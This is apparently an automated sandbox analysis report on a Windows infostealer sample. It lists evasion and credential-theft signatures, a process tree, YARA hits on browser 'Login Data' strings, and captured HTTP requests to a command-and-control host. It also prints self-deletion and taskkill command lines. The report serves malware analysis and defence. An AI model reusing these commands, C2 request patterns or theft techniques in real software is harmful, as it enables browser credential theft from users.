Play interactive tour

Edit tour

Analysis Report N1yprTBBXs.exe

Overview

General Information

Sample Name:	N1yprTBBXs.exe
Analysis ID:	346123
MD5:	f7d7c89f3f5cbc925480b46b7b934157
SHA1:	73e389b70cf3d8975ccbaf7d04f4c45cc80be860
SHA256:	2870f899f2e9ec540da321f603cfb1a735dcd06df016718e663dc78fefdf5e0a
Most interesting Screenshot:

Detection

Score:	93
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to detect sleep reduction / modifications

Contains functionality to infect the boot sector

Hides threads from debuggers

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file has a writeable .text section

Registers a new ROOT certificate

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read device registry values (via SetupAPI)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Installs a Chrome extension

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains strange resources

Queries device information via Setup API

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara signature match

Classification

Startup

System is w10x64

N1yprTBBXs.exe (PID: 6476 cmdline: 'C:\Users\user\Desktop\N1yprTBBXs.exe' MD5: F7D7C89F3F5CBC925480B46B7B934157)

msiexec.exe (PID: 6548 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

6272167835D47591.exe (PID: 6612 cmdline: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01 MD5: F7D7C89F3F5CBC925480B46B7B934157)

1611970727133.exe (PID: 6944 cmdline: 'C:\Users\user\AppData\Roaming\1611970727133.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970727133.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)

ThunderFW.exe (PID: 7100 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)

cmd.exe (PID: 6096 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 3656 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

6272167835D47591.exe (PID: 6684 cmdline: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01 MD5: F7D7C89F3F5CBC925480B46B7B934157)

cmd.exe (PID: 7012 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 7132 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cmd.exe (PID: 7100 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 5112 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

cmd.exe (PID: 6716 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 6848 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

msiexec.exe (PID: 6640 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0B37D2846804C02059732A6A10D93625 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.278675442.0000000002730000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000002.00000002.350264468.0000000002880000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000000.00000002.264281682.0000000002750000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.N1yprTBBXs.exe.2750000.2.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
0.2.N1yprTBBXs.exe.2750000.2.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.6272167835D47591.exe.10000000.7.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.6272167835D47591.exe.2880000.4.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.6272167835D47591.exe.2730000.5.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.6272167835D47591.exe.10000000.7.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.6272167835D47591.exe.2880000.4.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
0.2.N1yprTBBXs.exe.10000000.6.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.6272167835D47591.exe.2730000.5.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.6272167835D47591.exe.3350000.6.unpack	APT34_PICKPOCKET	unknown	unknown	0x1fec84:$s2: \nss3.dll 0x247cf8:$s2: \nss3.dll 0x3fa4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1ced54:$s5: \Login Data 0x1cee44:$s5: \Login Data 0x1cef34:$s5: \Login Data 0x1cf074:$s5: \Login Data 0x1cf284:$s5: \Login Data 0x1cf304:$s5: \Login Data 0x1cf384:$s5: \Login Data 0x1cf448:$s5: \Login Data 0x1cf644:$s5: \Login Data 0x1cf754:$s5: \Login Data 0x1cf8e4:$s5: \Login Data 0x1cf954:$s5: \Login Data 0x1fecf8:$s6: %s\Mozilla\Firefox\profiles.ini 0x247d78:$s6: %s\Mozilla\Firefox\profiles.ini 0x1ced55:$s7: Login Data 0x1cee45:$s7: Login Data 0x1cef35:$s7: Login Data 0x1cf075:$s7: Login Data
4.2.6272167835D47591.exe.32e0000.6.unpack	APT34_PICKPOCKET	unknown	unknown	0x1fec84:$s2: \nss3.dll 0x247cf8:$s2: \nss3.dll 0x3fa4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1ced54:$s5: \Login Data 0x1cee44:$s5: \Login Data 0x1cef34:$s5: \Login Data 0x1cf074:$s5: \Login Data 0x1cf284:$s5: \Login Data 0x1cf304:$s5: \Login Data 0x1cf384:$s5: \Login Data 0x1cf448:$s5: \Login Data 0x1cf644:$s5: \Login Data 0x1cf754:$s5: \Login Data 0x1cf8e4:$s5: \Login Data 0x1cf954:$s5: \Login Data 0x1fecf8:$s6: %s\Mozilla\Firefox\profiles.ini 0x247d78:$s6: %s\Mozilla\Firefox\profiles.ini 0x1ced55:$s7: Login Data 0x1cee45:$s7: Login Data 0x1cef35:$s7: Login Data 0x1cf075:$s7: Login Data
Click to see the 6 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Metadefender: Detection: 18%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	ReversingLabs: Detection: 59%

Multi AV Scanner detection for submitted file

Show sources

Source: N1yprTBBXs.exe	Virustotal: Detection: 38%	Perma Link
Source: N1yprTBBXs.exe	Metadefender: Detection: 18%	Perma Link
Source: N1yprTBBXs.exe	ReversingLabs: Detection: 59%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: N1yprTBBXs.exe

Joe Sandbox ML: detected

Cryptography:

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004C24B0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash,
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00463680 _memset,GetAdaptersInfo,_memset,_sprintf,CryptAcquireContextW,CryptCreateHash,CryptHashData,_memset,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,_sprintf,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00456840 CryptDecodeObject,CryptAcquireContextW,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptImportKey,
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0045C870 CryptQueryObject,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertCloseStore,
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Unpacked PE file: 0.2.N1yprTBBXs.exe.2750000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Unpacked PE file: 2.2.6272167835D47591.exe.2880000.4.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Unpacked PE file: 4.2.6272167835D47591.exe.2730000.5.unpack

Uses 32bit PE files

Show sources

Source: N1yprTBBXs.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Uses new MSVCR Dlls

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: N1yprTBBXs.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970727133.exe, 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp, 1611970727133.exe.2.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.2.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source:	Binary string: atl71.pdb source: atl71.dll.2.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source:	Binary string: p:\p\agents\hpam2.eem\recipes\499894881\base\branches\goopy2_release_branch\googleclient\ime\goopy\scons-out\opt\obj\syncer\daemon_unsigned.pdb source: N1yprTBBXs.exe
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source:	Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI1983.tmp.1.dr

Spreading:

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00410120 _memset,PathCombineW,_memset,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,FindClose,
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00413360 _memset,_memset,PathCombineW,FindFirstFileW,_memset,PathCombineW,DeleteFileW,GetLastError,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,MoveFileExW,
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1001A170 FindFirstFileA,FindClose,

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\

Networking:

Uses ping.exe to check the status of other devices and networks

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: global traffic

HTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: */*

Source: global traffic	HTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1393Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
